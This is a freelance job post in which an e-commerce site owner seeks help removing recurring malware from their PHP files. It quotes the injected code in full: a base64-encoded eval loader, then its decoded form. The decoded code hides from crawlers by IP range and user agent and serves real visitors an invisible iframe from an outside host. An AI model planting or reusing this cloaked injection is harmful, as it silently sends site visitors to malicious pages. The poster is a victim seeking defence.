Devam Ediyor

513051 virus/malware removal

I have a virus on my e-commerce site which is repeatedly modifying my [url removed, login to view] files, adding the following code

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9jdGZhZWZsLmNvLnR2Lz9nbz0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2lmcmFtZT4nOw0KfQ=='));

this is decoded as follows:

error_reporting(0);

$bot = FALSE ;

$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','[url removed, login to view]','[url removed, login to view]','[url removed, login to view]','htmldoc','webcollage','[url removed, login to view]','[url removed, login to view]','12345','httpclient','[url removed, login to view]','snoopy','feedtools','[url removed, login to view]','[url removed, login to view]','[url removed, login to view]','rrrrrrrrr','magent','download master','[url removed, login to view]','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','[url removed, login to view]','wordpress','rssreader','mybloglog api');

$stop_ips_masks = array(

array("216.239.32.0","[url removed, login to view]"),

array("64.68.80.0" ,"[url removed, login to view]" ),

array("66.102.0.0", "[url removed, login to view]"),

array("64.233.160.0","[url removed, login to view]"),

array("66.249.64.0", "[url removed, login to view]"),

array("72.14.192.0", "[url removed, login to view]"),

array("209.85.128.0","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("173.194.0.0","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("64.68.88.0","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("[url removed, login to view]","[url removed, login to view]"),

array("74.125.0.0","[url removed, login to view]"),

array("65.52.0.0","[url removed, login to view]"),

array("74.6.0.0","[url removed, login to view]"),

array("67.195.0.0","[url removed, login to view]"),

array("72.30.0.0","[url removed, login to view]"),

array("38.0.0.0","[url removed, login to view]")

);

$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));

foreach ( $stop_ips_masks as $IPs ) {

$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));

if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}

}

foreach ($user_agent_to_filter as $bot_sign){

if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}

}

if (!$bot) {

echo '<iframe src="[url removed, login to view]" width="1" height="1"></iframe>';

}

my site was suspended due to a phlishing attack, however i have had it re-stated

IMPORTANT

I need someone who has previously completely resolved this issue before and has the knowledge as to how the hacker is able to access my files and the precautions needed to prevent happening again.

No second guessers need apply - sorry but need someone with previous experience of this hack if possible as its likely to involve quite a lot of work to resolve completely - I am not experienced at all in this area so i need somone who can do this work for me, not someone to tell me what i need to do

i have email and msn for communicating

Beceriler: Her şey Kabul, Drupal, e-Ticaret, PHP, Web Güvenliği, Web Sitesi Yönetimi, WordPress

Daha fazlasını görün: php hack code, master security, lt security, code site web, 233, wordpress malware removal, yandex, wordpress hack, wordpress bot, web security hacker, vlc media player, virus, site malware, need virus, master work, malware removal, magent, image removal, hack web, hack email, email hack, decoded, bot needed web, arianna, email iframe

İşveren Hakkında:
( 9 değerlendirme ) Stroud, United Kingdom

Proje NO: #2258983

Seçilen:

devd22

Professional and quick work.Thanks Dev

0 gün içinde 40$ USD
(262 Değerlendirme)
5.9